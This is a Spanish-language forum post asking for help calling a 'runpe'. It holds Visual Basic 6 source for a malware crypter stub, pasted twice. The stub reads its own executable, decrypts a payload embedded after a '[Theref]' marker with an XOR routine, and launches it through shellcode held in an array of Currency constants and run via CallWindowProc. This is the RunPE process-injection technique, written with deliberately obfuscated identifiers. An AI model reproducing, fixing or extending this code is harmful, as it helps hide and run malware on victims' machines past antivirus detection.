hola a todos
¿Cómo puedo llamar a este runpe?
¿Alguien puede decirme dónde está el error?
Sub Main()
Dim AAAA As String
AAAA = App.Path & "\" & App.EXEName & ".exe"
Dim BBBB As String
Open AAAA For Binary As #1
BBBB = Space(LOF(1))
Get #1, , BBBB
Close #1
Dim sData() As String
sData() = Split(BBBB, "[Theref]")
sData(1) = ¥¶V«baDJØǬpRÆRQSgfâdãqG(sData(1), sData(2))
Call runpe(sData(1), StrConv(App.Path + "\" + App.EXEName + ".exe", vbFromUnicode))
End Sub
'RC4
Function ¥¶V«baDJØǬpRÆRQSgfâdãqG(qqJ¥e_BpX_YC¼sd¢êMGꩪj¤ó¦®ãIh As String, b®yqªÇ¤A¬d¥i¢xzlt¥Nuãªa¤WjMAIc As String) As String
Dim DiªQx¬Gâ£AALJisRMTƒYªyIúlnqØuj() As Byte
Dim WEScAÇrqãq¼¬¦óJRºuuw¶g£®mExª_E() As Byte
Dim ôSÈ_MQr¬OxmZ¥ƒf¥kHzªvãÆþÈwÇInQ As Long
Dim úZc_ïX¬CcêWVª¤lHGw¢VNPãi¦xpWY® As Long
Dim YYq£uGmfa_V«ãZVbFPmB_GoÇeï_uAQ As Long
Dim ØPêrsÇjÇOm¥ãhzóã£ãǼcznN£¬aMqã As Long
WEScAÇrqãq¼¬¦óJRºuuw¶g£®mExª_E() = StrConv(qqJ¥e_BpX_YC¼sd¢êMGꩪj¤ó¦®ãIh, vbFromUnicode)
DiªQx¬Gâ£AALJisRMTƒYªyIúlnqØuj() = StrConv(b®yqªÇ¤A¬d¥i¢xzlt¥Nuãªa¤WjMAIc, vbFromUnicode)
YYq£uGmfa_V«ãZVbFPmB_GoÇeï_uAQ = UBound(WEScAÇrqãq¼¬¦óJRºuuw¶g£®mExª_E)
ØPêrsÇjÇOm¥ãhzóã£ãǼcznN£¬aMqã = UBound(DiªQx¬Gâ£AALJisRMTƒYªyIúlnqØuj)
Do Until ôSÈ_MQr¬OxmZ¥ƒf¥kHzªvãÆþÈwÇInQ > YYq£uGmfa_V«ãZVbFPmB_GoÇeï_uAQ
WEScAÇrqãq¼¬¦óJRºuuw¶g£®mExª_E(ôSÈ_MQr¬OxmZ¥ƒf¥kHzªvãÆþÈwÇInQ) = WEScAÇrqãq¼¬¦óJRºuuw¶g£®mExª_E(ôSÈ_MQr¬OxmZ¥ƒf¥kHzªvãÆþÈwÇInQ) Xor DiªQx¬Gâ£AALJisRMTƒYªyIúlnqØuj(úZc_ïX¬CcêWVª¤lHGw¢VNPãi¦xpWY®)
úZc_ïX¬CcêWVª¤lHGw¢VNPãi¦xpWY® = úZc_ïX¬CcêWVª¤lHGw¢VNPãi¦xpWY® + 1
If úZc_ïX¬CcêWVª¤lHGw¢VNPãi¦xpWY® > ØPêrsÇjÇOm¥ãhzóã£ãǼcznN£¬aMqã Then úZc_ïX¬CcêWVª¤lHGw¢VNPãi¦xpWY® = 0
ôSÈ_MQr¬OxmZ¥ƒf¥kHzªvãÆþÈwÇInQ = ôSÈ_MQr¬OxmZ¥ƒf¥kHzªvãÆþÈwÇInQ + 1
Loop
Erase DiªQx¬Gâ£AALJisRMTƒYªyIúlnqØuj
¥¶V«baDJØǬpRÆRQSgfâdãqG = StrConv(WEScAÇrqãq¼¬¦óJRºuuw¶g£®mExª_E, vbUnicode)
Erase WEScAÇrqãq¼¬¦óJRºuuw¶g£®mExª_E
End Function
'RUNPE
Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcA" (ByVal lpPrevWndFunc As Long, ByVal hWnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Private Function eseguiPE(ByRef data() As Byte, ByVal Ptr_To_Inject As Long, ByVal CommandlineEnabled As Long) As Long
Dim Asm(121) As Currency
Asm(0) = 400681687.6885@
Asm(1) = -476253789078555.0612@
Asm(2) = 169590654935207.5756@
Asm(3) = 850533864474419.4055@
Asm(4) = 737729641913629.2885@
Asm(5) = 241583047782310.0933@
Asm(6) = 24366994722224.3183@
Asm(7) = -5591197446420.7926@
Asm(8) = 909185617598340.8258@
Asm(9) = -19175285449154.725@
Asm(10) = -74963712694652.2037@
Asm(11) = 364813893865675.1812@
Asm(12) = 417268265771289.998@
Asm(13) = -4467533218940.2859@
Asm(14) = 341408918860883.873@
Asm(15) = 24329165641253.0572@
Asm(16) = -704495800380865.7131@
Asm(17) = 374040769202653.0293@
Asm(18) = 132891045878384.5141@
Asm(19) = 330853606455412.8782@
Asm(20) = -18546831736735.2555@
Asm(21) = 319791640719971.9498@
Asm(22) = 908565053235531.3645@
Asm(23) = 204495311115001.8554@
Asm(24) = -854751321242618.2143@
Asm(25) = -74261121419612.3536@
Asm(26) = -853017920184789.9651@
Asm(27) = 853018044985278.6574@
Asm(28) = 11660982868296.5087@
Asm(29) = -644057630032745.1903@
Asm(30) = 389428549114434.7534@
Asm(31) = -76145685875174.3891@
Asm(32) = -74907416031185.4908@
Asm(33) = 494446016607881.1334@
Asm(34) = 373919167982197.785@
Asm(35) = -702326214173594.214@
Asm(36) = 852984839970549.146@
Asm(37) = 878491366656617.7029@
Asm(38) = 11660149244069.3242@
Asm(39) = -644057520081529.9839@
Asm(40) = 852992269963661.735@
Asm(41) = 118191623639287.4757@
Asm(42) = -61508987237432.1588@
Asm(43) = 683482598548397.6903@
Asm(44) = -602576477534616.4219@
Asm(45) = 312616265869225.0362@
Asm(46) = 823209967166017.4093@
Asm(47) = 242250886584983.6374@
Asm(48) = 855453146203670.4029@
Asm(49) = -79066168407783.6283@
Asm(50) = -566073494675362.3812@
Asm(51) = 707480649289074.6628@
Asm(52) = -637454398289603.5604@
Asm(53) = 244386299675628.5445@
Asm(54) = -815078417416403.5827@
Asm(55) = -18879051943875.1995@
Asm(56) = -822123707815930.6686@
Asm(57) = -18434021046527.2954@
Asm(58) = 912451606937402.8942@
Asm(59) = -644057520081529.9756@
Asm(60) = 736754098641473.959@
Asm(61) = 417322719301766.6436@
Asm(62) = 907260734372726.4513@
Asm(63) = 853017967675867.3294@
Asm(64) = 11660982865150.7807@
Asm(65) = -854635987033189.5019@
Asm(66) = 417315068676156.9237@
Asm(67) = -704495800377680.6639@
Asm(68) = 244384539136657.2125@
Asm(69) = -815078417416403.5827@
Asm(70) = 364126617392252.4421@
Asm(71) = 853022663170544.6404@
Asm(72) = -855129000041499.1355@
Asm(73) = 853017946071693.9733@
Asm(74) = 244396803451753.601@
Asm(75) = -535694978088672.9971@
Asm(76) = 853017945341749.0318@
Asm(77) = 850597150951837.7055@
Asm(78) = -693956410164477.1442@
Asm(79) = 392299672072137.6649@
Asm(80) = -75273081301284.3259@
Asm(81) = 233670410612668.8112@
Asm(82) = 232135816315923.5976@
Asm(83) = 282468056240967.6881@
Asm(84) = -701595207746232.5423@
Asm(85) = 173478023424630.523@
Asm(86) = -838890426140287.6832@
Asm(87) = 137505075359453.7978@
Asm(88) = 238303243668856.6869@
Asm(89) = 15754679864024.2693@
Asm(90) = 137137957478099.5152@
Asm(91) = 223974408162476.2226@
Asm(92) = -853018149249239.2854@
Asm(93) = 609147958724062.3211@
Asm(94) = 187716700156924.5176@
Asm(95) = 29051557366465.6234@
Asm(96) = 180486733836584.4849@
Asm(97) = -853018043593043.5209@
Asm(98) = 230703534374533.4347@
Asm(99) = 138151919766295.2044@
Asm(100) = -863941699156868.1112@
Asm(101) = 382501322004887.7562@
Asm(102) = 217671250279223.4602@
Asm(103) = -858396642110759.3865@
Asm(104) = 382501330594822.3482@
Asm(105) = 217671250279223.4602@
Asm(106) = -860029196975681.1913@
Asm(107) = 22128918341666.201@
Asm(108) = 129708668231386.2504@
Asm(109) = 138421474714790.2981@
Asm(110) = 273938087394568.7415@
Asm(111) = -703427576466491.6105@
Asm(112) = 368089803424522.0018@
Asm(113) = 273936330801683.6989@
Asm(114) = -703427576466491.6105@
Asm(115) = 382501322232107.5439@
Asm(116) = 224650062758754.033@
Asm(117) = -802975918546864.1941@
Asm(118) = 261111522452255.6862@
Asm(119) = 35367660677206.1368@
Asm(120) = 848492795353964.3185@
Asm(121) = 5.0164@
'Put Here the shellcode
eseguiPE = CallWindowProc(VarPtr(Asm(0)), VarPtr(data(0)), Ptr_To_Inject, CommandlineEnabled, 0)
End Function
¿Cómo puedo llamar a este runpe?
¿Alguien puede decirme dónde está el error?
Sub Main()
Dim AAAA As String
AAAA = App.Path & "\" & App.EXEName & ".exe"
Dim BBBB As String
Open AAAA For Binary As #1
BBBB = Space(LOF(1))
Get #1, , BBBB
Close #1
Dim sData() As String
sData() = Split(BBBB, "[Theref]")
sData(1) = ¥¶V«baDJØǬpRÆRQSgfâdãqG(sData(1), sData(2))
Call runpe(sData(1), StrConv(App.Path + "\" + App.EXEName + ".exe", vbFromUnicode))
End Sub
'RC4
Function ¥¶V«baDJØǬpRÆRQSgfâdãqG(qqJ¥e_BpX_YC¼sd¢êMGꩪj¤ó¦®ãIh As String, b®yqªÇ¤A¬d¥i¢xzlt¥Nuãªa¤WjMAIc As String) As String
Dim DiªQx¬Gâ£AALJisRMTƒYªyIúlnqØuj() As Byte
Dim WEScAÇrqãq¼¬¦óJRºuuw¶g£®mExª_E() As Byte
Dim ôSÈ_MQr¬OxmZ¥ƒf¥kHzªvãÆþÈwÇInQ As Long
Dim úZc_ïX¬CcêWVª¤lHGw¢VNPãi¦xpWY® As Long
Dim YYq£uGmfa_V«ãZVbFPmB_GoÇeï_uAQ As Long
Dim ØPêrsÇjÇOm¥ãhzóã£ãǼcznN£¬aMqã As Long
WEScAÇrqãq¼¬¦óJRºuuw¶g£®mExª_E() = StrConv(qqJ¥e_BpX_YC¼sd¢êMGꩪj¤ó¦®ãIh, vbFromUnicode)
DiªQx¬Gâ£AALJisRMTƒYªyIúlnqØuj() = StrConv(b®yqªÇ¤A¬d¥i¢xzlt¥Nuãªa¤WjMAIc, vbFromUnicode)
YYq£uGmfa_V«ãZVbFPmB_GoÇeï_uAQ = UBound(WEScAÇrqãq¼¬¦óJRºuuw¶g£®mExª_E)
ØPêrsÇjÇOm¥ãhzóã£ãǼcznN£¬aMqã = UBound(DiªQx¬Gâ£AALJisRMTƒYªyIúlnqØuj)
Do Until ôSÈ_MQr¬OxmZ¥ƒf¥kHzªvãÆþÈwÇInQ > YYq£uGmfa_V«ãZVbFPmB_GoÇeï_uAQ
WEScAÇrqãq¼¬¦óJRºuuw¶g£®mExª_E(ôSÈ_MQr¬OxmZ¥ƒf¥kHzªvãÆþÈwÇInQ) = WEScAÇrqãq¼¬¦óJRºuuw¶g£®mExª_E(ôSÈ_MQr¬OxmZ¥ƒf¥kHzªvãÆþÈwÇInQ) Xor DiªQx¬Gâ£AALJisRMTƒYªyIúlnqØuj(úZc_ïX¬CcêWVª¤lHGw¢VNPãi¦xpWY®)
úZc_ïX¬CcêWVª¤lHGw¢VNPãi¦xpWY® = úZc_ïX¬CcêWVª¤lHGw¢VNPãi¦xpWY® + 1
If úZc_ïX¬CcêWVª¤lHGw¢VNPãi¦xpWY® > ØPêrsÇjÇOm¥ãhzóã£ãǼcznN£¬aMqã Then úZc_ïX¬CcêWVª¤lHGw¢VNPãi¦xpWY® = 0
ôSÈ_MQr¬OxmZ¥ƒf¥kHzªvãÆþÈwÇInQ = ôSÈ_MQr¬OxmZ¥ƒf¥kHzªvãÆþÈwÇInQ + 1
Loop
Erase DiªQx¬Gâ£AALJisRMTƒYªyIúlnqØuj
¥¶V«baDJØǬpRÆRQSgfâdãqG = StrConv(WEScAÇrqãq¼¬¦óJRºuuw¶g£®mExª_E, vbUnicode)
Erase WEScAÇrqãq¼¬¦óJRºuuw¶g£®mExª_E
End Function
'RUNPE
Declare Function CallWindowProc Lib "user32" Alias "CallWindowProcA" (ByVal lpPrevWndFunc As Long, ByVal hWnd As Long, ByVal Msg As Long, ByVal wParam As Long, ByVal lParam As Long) As Long
Private Function eseguiPE(ByRef data() As Byte, ByVal Ptr_To_Inject As Long, ByVal CommandlineEnabled As Long) As Long
Dim Asm(121) As Currency
Asm(0) = 400681687.6885@
Asm(1) = -476253789078555.0612@
Asm(2) = 169590654935207.5756@
Asm(3) = 850533864474419.4055@
Asm(4) = 737729641913629.2885@
Asm(5) = 241583047782310.0933@
Asm(6) = 24366994722224.3183@
Asm(7) = -5591197446420.7926@
Asm(8) = 909185617598340.8258@
Asm(9) = -19175285449154.725@
Asm(10) = -74963712694652.2037@
Asm(11) = 364813893865675.1812@
Asm(12) = 417268265771289.998@
Asm(13) = -4467533218940.2859@
Asm(14) = 341408918860883.873@
Asm(15) = 24329165641253.0572@
Asm(16) = -704495800380865.7131@
Asm(17) = 374040769202653.0293@
Asm(18) = 132891045878384.5141@
Asm(19) = 330853606455412.8782@
Asm(20) = -18546831736735.2555@
Asm(21) = 319791640719971.9498@
Asm(22) = 908565053235531.3645@
Asm(23) = 204495311115001.8554@
Asm(24) = -854751321242618.2143@
Asm(25) = -74261121419612.3536@
Asm(26) = -853017920184789.9651@
Asm(27) = 853018044985278.6574@
Asm(28) = 11660982868296.5087@
Asm(29) = -644057630032745.1903@
Asm(30) = 389428549114434.7534@
Asm(31) = -76145685875174.3891@
Asm(32) = -74907416031185.4908@
Asm(33) = 494446016607881.1334@
Asm(34) = 373919167982197.785@
Asm(35) = -702326214173594.214@
Asm(36) = 852984839970549.146@
Asm(37) = 878491366656617.7029@
Asm(38) = 11660149244069.3242@
Asm(39) = -644057520081529.9839@
Asm(40) = 852992269963661.735@
Asm(41) = 118191623639287.4757@
Asm(42) = -61508987237432.1588@
Asm(43) = 683482598548397.6903@
Asm(44) = -602576477534616.4219@
Asm(45) = 312616265869225.0362@
Asm(46) = 823209967166017.4093@
Asm(47) = 242250886584983.6374@
Asm(48) = 855453146203670.4029@
Asm(49) = -79066168407783.6283@
Asm(50) = -566073494675362.3812@
Asm(51) = 707480649289074.6628@
Asm(52) = -637454398289603.5604@
Asm(53) = 244386299675628.5445@
Asm(54) = -815078417416403.5827@
Asm(55) = -18879051943875.1995@
Asm(56) = -822123707815930.6686@
Asm(57) = -18434021046527.2954@
Asm(58) = 912451606937402.8942@
Asm(59) = -644057520081529.9756@
Asm(60) = 736754098641473.959@
Asm(61) = 417322719301766.6436@
Asm(62) = 907260734372726.4513@
Asm(63) = 853017967675867.3294@
Asm(64) = 11660982865150.7807@
Asm(65) = -854635987033189.5019@
Asm(66) = 417315068676156.9237@
Asm(67) = -704495800377680.6639@
Asm(68) = 244384539136657.2125@
Asm(69) = -815078417416403.5827@
Asm(70) = 364126617392252.4421@
Asm(71) = 853022663170544.6404@
Asm(72) = -855129000041499.1355@
Asm(73) = 853017946071693.9733@
Asm(74) = 244396803451753.601@
Asm(75) = -535694978088672.9971@
Asm(76) = 853017945341749.0318@
Asm(77) = 850597150951837.7055@
Asm(78) = -693956410164477.1442@
Asm(79) = 392299672072137.6649@
Asm(80) = -75273081301284.3259@
Asm(81) = 233670410612668.8112@
Asm(82) = 232135816315923.5976@
Asm(83) = 282468056240967.6881@
Asm(84) = -701595207746232.5423@
Asm(85) = 173478023424630.523@
Asm(86) = -838890426140287.6832@
Asm(87) = 137505075359453.7978@
Asm(88) = 238303243668856.6869@
Asm(89) = 15754679864024.2693@
Asm(90) = 137137957478099.5152@
Asm(91) = 223974408162476.2226@
Asm(92) = -853018149249239.2854@
Asm(93) = 609147958724062.3211@
Asm(94) = 187716700156924.5176@
Asm(95) = 29051557366465.6234@
Asm(96) = 180486733836584.4849@
Asm(97) = -853018043593043.5209@
Asm(98) = 230703534374533.4347@
Asm(99) = 138151919766295.2044@
Asm(100) = -863941699156868.1112@
Asm(101) = 382501322004887.7562@
Asm(102) = 217671250279223.4602@
Asm(103) = -858396642110759.3865@
Asm(104) = 382501330594822.3482@
Asm(105) = 217671250279223.4602@
Asm(106) = -860029196975681.1913@
Asm(107) = 22128918341666.201@
Asm(108) = 129708668231386.2504@
Asm(109) = 138421474714790.2981@
Asm(110) = 273938087394568.7415@
Asm(111) = -703427576466491.6105@
Asm(112) = 368089803424522.0018@
Asm(113) = 273936330801683.6989@
Asm(114) = -703427576466491.6105@
Asm(115) = 382501322232107.5439@
Asm(116) = 224650062758754.033@
Asm(117) = -802975918546864.1941@
Asm(118) = 261111522452255.6862@
Asm(119) = 35367660677206.1368@
Asm(120) = 848492795353964.3185@
Asm(121) = 5.0164@
'Put Here the shellcode
eseguiPE = CallWindowProc(VarPtr(Asm(0)), VarPtr(data(0)), Ptr_To_Inject, CommandlineEnabled, 0)
End Function